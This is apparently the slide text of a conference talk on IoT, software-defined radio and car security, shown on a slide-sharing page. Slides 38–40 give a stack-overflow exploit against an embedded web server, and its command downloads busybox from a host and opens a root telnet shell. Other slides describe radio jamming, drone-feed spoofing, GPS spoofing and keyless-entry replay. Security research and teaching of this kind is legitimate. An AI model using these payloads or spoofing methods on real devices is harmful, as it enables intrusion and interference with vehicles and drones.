20200810_資訊洩漏所帶來的資安問題_turkey20200810_資訊洩漏所帶來的資安問題_turkey
20200810_資訊洩漏所帶來的資安問題_turkey
 
CYBERSEC 2020 臺灣資安大會 windows malware hot 5 - 短短
CYBERSEC 2020 臺灣資安大會 windows malware hot 5  - 短短CYBERSEC 2020 臺灣資安大會 windows malware hot 5  - 短短
CYBERSEC 2020 臺灣資安大會 windows malware hot 5 - 短短
 
HITCON CTF 介紹 - HG 導覽活動
HITCON CTF 介紹 - HG 導覽活動HITCON CTF 介紹 - HG 導覽活動
HITCON CTF 介紹 - HG 導覽活動
 
HITCON CTF 2019 特色 - HG 導覽活動
HITCON CTF 2019 特色 - HG 導覽活動HITCON CTF 2019 特色 - HG 導覽活動
HITCON CTF 2019 特色 - HG 導覽活動
 
HITCON CTF 2017 特色 - HG 導覽活動
HITCON CTF 2017 特色 - HG 導覽活動HITCON CTF 2017 特色 - HG 導覽活動
HITCON CTF 2017 特色 - HG 導覽活動
 
HITCON CTF 2016 特色 - HG 導覽活動
HITCON CTF 2016 特色 - HG 導覽活動HITCON CTF 2016 特色 - HG 導覽活動
HITCON CTF 2016 特色 - HG 導覽活動
 
iThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdf
iThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdfiThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdf
iThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdf
 
iThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdf
iThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdfiThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdf
iThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdf
 
Birds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom Kim
Birds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom KimBirds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom Kim
Birds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom Kim
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
 
未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&Turkey
未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&Turkey未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&Turkey
未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&Turkey
 
HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料
HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料
HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料
 
HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎
HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎
HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎
 
HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生
HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生
HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生
 
HITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - Turkey
HITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - TurkeyHITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - Turkey
HITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - Turkey
 
HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了
HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了
HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了
 
HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣
HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣
HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣
 
HITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - Belinda
HITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - BelindaHITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - Belinda
HITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - Belinda
 
逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)
逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)
逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)
 

Último

Substation Automation SCADA and Gateway Solutions by BRH
Substation Automation SCADA and Gateway Solutions by BRHSubstation Automation SCADA and Gateway Solutions by BRH
Substation Automation SCADA and Gateway Solutions by BRHbirinder2
 
Triangulation survey (Basic Mine Surveying)_MI10412MI.pptx
Triangulation survey (Basic Mine Surveying)_MI10412MI.pptxTriangulation survey (Basic Mine Surveying)_MI10412MI.pptx
Triangulation survey (Basic Mine Surveying)_MI10412MI.pptxRomil Mishra
 
Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...
Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...
Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...arifengg7
 
STATE TRANSITION DIAGRAM in psoc subject
STATE TRANSITION DIAGRAM in psoc subjectSTATE TRANSITION DIAGRAM in psoc subject
STATE TRANSITION DIAGRAM in psoc subjectGayathriM270621
 
2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.
2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.
2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.elesangwon
 
Comprehensive energy systems.pdf Comprehensive energy systems.pdf
Comprehensive energy systems.pdf Comprehensive energy systems.pdfComprehensive energy systems.pdf Comprehensive energy systems.pdf
Comprehensive energy systems.pdf Comprehensive energy systems.pdfalene1
 
Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...
Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...
Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...Amil baba
 
Robotics Group 10 (Control Schemes) cse.pdf
Robotics Group 10  (Control Schemes) cse.pdfRobotics Group 10  (Control Schemes) cse.pdf
Robotics Group 10 (Control Schemes) cse.pdfsahilsajad201
 
Detection&Tracking - Thermal imaging object detection and tracking
Detection&Tracking - Thermal imaging object detection and trackingDetection&Tracking - Thermal imaging object detection and tracking
Detection&Tracking - Thermal imaging object detection and trackinghadarpinhas1
 
Curve setting (Basic Mine Surveying)_MI10412MI.pptx
Curve setting (Basic Mine Surveying)_MI10412MI.pptxCurve setting (Basic Mine Surveying)_MI10412MI.pptx
Curve setting (Basic Mine Surveying)_MI10412MI.pptxRomil Mishra
 
A brief look at visionOS - How to develop app on Apple's Vision Pro
A brief look at visionOS - How to develop app on Apple's Vision ProA brief look at visionOS - How to develop app on Apple's Vision Pro
A brief look at visionOS - How to develop app on Apple's Vision ProRay Yuan Liu
 
Cost estimation approach: FP to COCOMO scenario based question
Cost estimation approach: FP to COCOMO scenario based questionCost estimation approach: FP to COCOMO scenario based question
Cost estimation approach: FP to COCOMO scenario based questionSneha Padhiar
 
Immutable Image-Based Operating Systems - EW2024.pdf
Immutable Image-Based Operating Systems - EW2024.pdfImmutable Image-Based Operating Systems - EW2024.pdf
Immutable Image-Based Operating Systems - EW2024.pdfDrew Moseley
 
Katarzyna Lipka-Sidor - BIM School Course
Katarzyna Lipka-Sidor - BIM School CourseKatarzyna Lipka-Sidor - BIM School Course
Katarzyna Lipka-Sidor - BIM School Coursebim.edu.pl
 
ADM100 Running Book for sap basis domain study
ADM100 Running Book for sap basis domain studyADM100 Running Book for sap basis domain study
ADM100 Running Book for sap basis domain studydhruvamdhruvil123
 
High Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMS
High Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMSHigh Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMS
High Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMSsandhya757531
 
SOFTWARE ESTIMATION COCOMO AND FP CALCULATION
SOFTWARE ESTIMATION COCOMO AND FP CALCULATIONSOFTWARE ESTIMATION COCOMO AND FP CALCULATION
SOFTWARE ESTIMATION COCOMO AND FP CALCULATIONSneha Padhiar
 
Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...
Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...
Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...shreenathji26
 
Novel 3D-Printed Soft Linear and Bending Actuators
Novel 3D-Printed Soft Linear and Bending ActuatorsNovel 3D-Printed Soft Linear and Bending Actuators
Novel 3D-Printed Soft Linear and Bending ActuatorsResearcher Researcher
 
multiple access in wireless communication
multiple access in wireless communicationmultiple access in wireless communication
multiple access in wireless communicationpanditadesh123
 

Último (20)

Substation Automation SCADA and Gateway Solutions by BRH
Substation Automation SCADA and Gateway Solutions by BRHSubstation Automation SCADA and Gateway Solutions by BRH
Substation Automation SCADA and Gateway Solutions by BRH
 
Triangulation survey (Basic Mine Surveying)_MI10412MI.pptx
Triangulation survey (Basic Mine Surveying)_MI10412MI.pptxTriangulation survey (Basic Mine Surveying)_MI10412MI.pptx
Triangulation survey (Basic Mine Surveying)_MI10412MI.pptx
 
Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...
Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...
Analysis and Evaluation of Dal Lake Biomass for Conversion to Fuel/Green fert...
 
STATE TRANSITION DIAGRAM in psoc subject
STATE TRANSITION DIAGRAM in psoc subjectSTATE TRANSITION DIAGRAM in psoc subject
STATE TRANSITION DIAGRAM in psoc subject
 
2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.
2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.
2022 AWS DNA Hackathon 장애 대응 솔루션 jarvis.
 
Comprehensive energy systems.pdf Comprehensive energy systems.pdf
Comprehensive energy systems.pdf Comprehensive energy systems.pdfComprehensive energy systems.pdf Comprehensive energy systems.pdf
Comprehensive energy systems.pdf Comprehensive energy systems.pdf
 
Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...
Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...
Uk-NO1 kala jadu karne wale ka contact number kala jadu karne wale baba kala ...
 
Robotics Group 10 (Control Schemes) cse.pdf
Robotics Group 10  (Control Schemes) cse.pdfRobotics Group 10  (Control Schemes) cse.pdf
Robotics Group 10 (Control Schemes) cse.pdf
 
Detection&Tracking - Thermal imaging object detection and tracking
Detection&Tracking - Thermal imaging object detection and trackingDetection&Tracking - Thermal imaging object detection and tracking
Detection&Tracking - Thermal imaging object detection and tracking
 
Curve setting (Basic Mine Surveying)_MI10412MI.pptx
Curve setting (Basic Mine Surveying)_MI10412MI.pptxCurve setting (Basic Mine Surveying)_MI10412MI.pptx
Curve setting (Basic Mine Surveying)_MI10412MI.pptx
 
A brief look at visionOS - How to develop app on Apple's Vision Pro
A brief look at visionOS - How to develop app on Apple's Vision ProA brief look at visionOS - How to develop app on Apple's Vision Pro
A brief look at visionOS - How to develop app on Apple's Vision Pro
 
Cost estimation approach: FP to COCOMO scenario based question
Cost estimation approach: FP to COCOMO scenario based questionCost estimation approach: FP to COCOMO scenario based question
Cost estimation approach: FP to COCOMO scenario based question
 
Immutable Image-Based Operating Systems - EW2024.pdf
Immutable Image-Based Operating Systems - EW2024.pdfImmutable Image-Based Operating Systems - EW2024.pdf
Immutable Image-Based Operating Systems - EW2024.pdf
 
Katarzyna Lipka-Sidor - BIM School Course
Katarzyna Lipka-Sidor - BIM School CourseKatarzyna Lipka-Sidor - BIM School Course
Katarzyna Lipka-Sidor - BIM School Course
 
ADM100 Running Book for sap basis domain study
ADM100 Running Book for sap basis domain studyADM100 Running Book for sap basis domain study
ADM100 Running Book for sap basis domain study
 
High Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMS
High Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMSHigh Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMS
High Voltage Engineering- OVER VOLTAGES IN ELECTRICAL POWER SYSTEMS
 
SOFTWARE ESTIMATION COCOMO AND FP CALCULATION
SOFTWARE ESTIMATION COCOMO AND FP CALCULATIONSOFTWARE ESTIMATION COCOMO AND FP CALCULATION
SOFTWARE ESTIMATION COCOMO AND FP CALCULATION
 
Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...
Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...
Introduction to Artificial Intelligence: Intelligent Agents, State Space Sear...
 
Novel 3D-Printed Soft Linear and Bending Actuators
Novel 3D-Printed Soft Linear and Bending ActuatorsNovel 3D-Printed Soft Linear and Bending Actuators
Novel 3D-Printed Soft Linear and Bending Actuators
 
multiple access in wireless communication
multiple access in wireless communicationmultiple access in wireless communication
multiple access in wireless communication
 

Birds of a Feather 2017: 邀請分享 IoT, SDR, and Car Security - Aaron

  • 1. IoT, SDR, and Car Security Aaron Luo
  • 2. Agenda • How to hacking IoT? – Hardware – Software – Radio Signal – Real Case • Introduce the Car Architecture • Hacking the Car
  • 3. 3
  • 4. From Attacker’s View • Physical – Network Switchboard – USB Slug • Radio – Wifi, Bluetooth, ZigBee, Z-wave, AM, FM, GPS, GSM…etc. • Network – Web Server/Client – Firmware Update – Hidden Service Port • Human – Phishing – Default Password
  • 5. How to hacking? (Before disassemble) • Scanning open services – Nmap • Sniff traffics – Router - tcpdump – Mirror port – Build bridge network – Wifi hotspot – Arp spoofing – SDR • Download the firmware – From website – From firmware update module
  • 6. Sniff traffics – Router • Software router – pfSense
  • 7. Sniff traffics – Mirror port • LAN Tap Pro
  • 8. Sniff traffics – Build bridge network • RaspberryPI • External Ethernet card*1 ifconfig eth0 0.0.0.0 promisc up Ifconfig eth1 0.0.0.0 promisc up Brctl addbr br0 Brctl addif br0 eth0 Brctl addif br0 eth1 Ifconfig br0 up tcpdump -i eth0
  • 9. Sniff traffics – Arp Spoofing • ettercap • arpspoof+mitmproxy
  • 10. Sniff traffics - SDR • Software-Defined Radio – Generate any radio protocol if device support that frequency – Writing Modulation / Demodulation program by yourself – Simply inspect the radio spectrum
  • 11. How to hacking? (After disassemble) • Identify chipsets • Find out the debug port – UART – SWD – JTAG • Dump the flash rom – Bus Pirate • Analysis the signal – Logic Analyzer
  • 12. Identify chipsets • Remove the glue • Google same type chipsets to compare datasheet
  • 13. Find out debug port • UART – TX – RX – GND – VCC • SWD – SWDIO – SWCLK – GND – VCC • JTAG – TDI – TDO – GND – VCC
  • 14. Dump the Rom • Bus Pirate • Dump EEPROM via SPI (reference from http://iotpentest.com/how-to-dump-the-firmware-from-the-router-using-buspirate/)
  • 15. Analysis the signal • Saleae Logic Analyzer – Just care the GND
  • 19. Find out debug port – part 1 • Special unused 4 port – Guess it’s debug port – welding
  • 20. Find out debug port – part 2 • Find out the GND
  • 21. Find out debug port – part 3 • Test ports
  • 22. Find out debug port – part 4 • Measure the voltage
  • 23. Find out debug port – part 5 • Analysis the signal with Logic Analyzer – GND-GND
  • 24. Find out debug port – part 6 • Analysis the signal with Logic Analyzer
  • 25. Find out debug port – part 7 • Analysis the signal with Logic Analyzer – Calculate the baudrate – 1/0.00001725 ~= 57971 – General baudrate: 300,1200,2400,4800,9600,14400,19200,28800,38400,57600,115200
  • 26. Find out debug port – part 8 • Analysis the signal with Logic Analyzer – Decode with Async Serial – Baudrate 57600
  • 27. Find out debug port – part 9 • Analysis the signal with Logic Analyzer – Finally decode the signal
  • 28. Find out debug port – part 10 • Analysis the signal with Logic Analyzer – Finally we know…
  • 29. Find out debug port – part 11 • Connect to USBTTL – GND-GND – TXD-RXD – RXD-TXD
  • 30. Find out debug port – part 12 • Finally we got the Putty shell
  • 31. Key mapping is wrong? • 0x13 -> v • 0x14 -> ? • 0x15 -> u • 0x16 -> ? • 0x17 -> t • I follow this strange rule to write the decoder char asciitable[] = " !"#$%&'()*+,- ./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~"; for (int i=0;i<sizeof(asciitable)-1;i++) { if (tmpchr == asciitable[i]) { tmpinput[inputpos++] = 0x03+(sizeof(asciitable)-2-i)*2; } }
  • 33. Just because RXD did not weld well Just because RXD did not weld well Just because RXD did not weld well
  • 34. Pick up the filesystem • tar -zcvf /www/fs.tar.gz /
  • 35. Find the vulnerability – part 1 • Fuzzing the website – httpClient.request("POST","/login.html","a"*(30000) • /usr/sbin/httpd will crash
  • 36. Find the vulnerability – part 2 • Upload gdbserver (mips version) for remote debugging – /usr/sbin/httpd; ./gdbserver --attach 0.0.0.0:5555 `pidof httpd`
  • 37. Find the vulnerability – part 3 • Stack overflow • Finally located the crash function – /usr/sbin/httpd 0x0040D44C • If stack is incorrect it will crash before control the ra(ip) • So need to dump original stack to fix – dump memory stack.bin $sp $sp+26000 • ASLR is enabled – # cat /proc/sys/kernel/randomize_va_space – 1
  • 38. Find the vulnerability – part 4 • Control the ra (ip) origstack = "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00“ s0 = "x41x41x41x41" s1 = "x00x00x54x00" s2 = "x43x43x43x43" s3 = "x44x44x44x44" s4 = "x8Cx8Ex4Fx00" s5 = "x46x46x46x46" s6 = "x60xE2x53x00" s7 = "x04x00x00x00" s8 = "x49x49x49x49" ra = "x78x56x34x12“ • httpClient.request("POST","/login.html","a"*(25262)+origstac k+s0+s1+s2+s3+s4+s5+s6+s7+s8+ra) aaaa..(25262 bytes) Original Stack Variables(48 bytes) Register S0~S8 (36 bytes) Return Address (0x12345678)
  • 39. Find the vulnerability – part 5 • Bypass the ASLR – 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized. – Find rop chain on self program
  • 40. Finally we got the RCE root shell origstack = "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00" s0 = "x41x41x41x41" s1 = "x00x00x54x00" s2 = "x43x43x43x43" s3 = "x44x44x44x44" s4 = "x8Cx8Ex4Fx00" s5 = "x46x46x46x46" s6 = "x60xE2x53x00" s7 = "x04x00x00x00" s8 = "x49x49x49x49" ra = "x58x79x40x00" command = "wget -O /tmp/busybox-mipsel http://192.168.11.4:8080/busybox-mipsel && chmod 755 /tmp/busybox-mipsel && cd /tmp && ./busybox-mipsel telnetd -l /bin/sh -p 2323" httpClient.request("POST","/login.html","a"*(25262)+origstack+s0+s1+s2+s3+s4+s5+s6+s7+s8+ra+"a"*32+co mmand,headers) aaaa..(25262 bytes) Original Stack Variables(48 bytes) Register S0~S8 (36 bytes) Return Address (return to system()) aaaa..(32 bytes) CommandLine Ascii String
  • 41. Let’s play SDR (software defined radio)
  • 42. What is SDR • Software-Defined Radio – Generate any radio protocol if device support that frequency – Writing Modulation / Demodulation program by yourself – Simply inspect the radio spectrum
  • 43. SDR Tools • HackRF tools • Gqrx - Display the spectrum waterfall • GNURadio – GUI tool for modulation/demodulation • OpenBTS – open source tool for building GSM Station • Artemis – Identify protocol • Baudline – for analysis the I/Q data
  • 44. If you have the SDR
  • 46. Jamming the radio signal (like DDOS) DEMO
  • 47. Sniffing airplane <-> ground station ads-b signal
  • 48. Sniffing GSM – SMS traffic
  • 49. Putting some image on spectrum spectrum_painter
  • 51. Let’s analysis the Drone radio • How to find the frequency? – FCC ID – Inspect by SDR
  • 52. Radio Signal Analysis P3A use two modulation/demodulation to transfer data with 2.4GHz ISM band
  • 53. RC to Drone radio spectrum (FHSS) • Control drone direction (up down left right) • Frequency 2.400~2.483GHz, each channel about 1MHz
  • 54. DSSS - Drone to RC radio spectrum • For drone to remote controller image transmission • Frequency 2.4015~2.4815 GHz • split into 6 channels, each channel is about 10MHz
  • 55. Finally we found… • Images have no checksum mechanism, so we can jamming the radio frequency to show wrong image to controller
  • 56. DEMO
  • 58. Live Demo (open your mobile maps)
  • 59. Which function is associate with GPS? • No-fly zone • Return to home • Follow me • Waypoint
  • 60. How to spoof the GPS location? • Use the SDR • There have a good open-source GPS simulator in GitHub, called gps-sdr-sim, but it have some limitation, before you want fake a location, should wait for few minutes to generate the I/Q data • So we improve the code, let it can in real-time generate GPS signal and can be controlled with the joystick.
  • 62. How to Increase the radio range? • Buy some active directional antenna
  • 64.
  • 65. How to detect the fake GPS signal? • You need a GPS module to debug GPS signals. – U-blox M8N
  • 66. How to detect the fake GPS signal? • Validate the time between satellite time and real time
  • 67. How to detect the fake GPS signal? • Check the motion speed between point to point – For example it is impossible to change your location from Taiwan to Serbia in one second
  • 68. How to detect the fake GPS signal? • Validate the GPS sub-frame data
  • 69. Develop the fake GPS detector • Board: RaspberryPI • GPS modules: u-blox
  • 72. Car Architecture (Reference from: http://knoppix.ru/sentinel/130312.html)
  • 73. CAN-BUS Network (Reference from: http://www.aa1car.com/library/can_systems.htm)
  • 74. Remote attack vector • Remote keyless • IVI System • Wireless - OBDII dongle
  • 75. Remote keyless • SDR – Record/Replay – Analysis the protocol – Proxy Tunnel
  • 76. IVI System • Connected with can-bus • Wifi • Bluetooth • Radio • Web browser
  • 77. DEMO
  • 78. Conclusion • IoT threats come from multi-dimensional – In addition to traditional IP network protocols, there are various types of radio protocols • Be careful CAN-BUS network with in-car wireless device • Comprehensive protection strategy is needed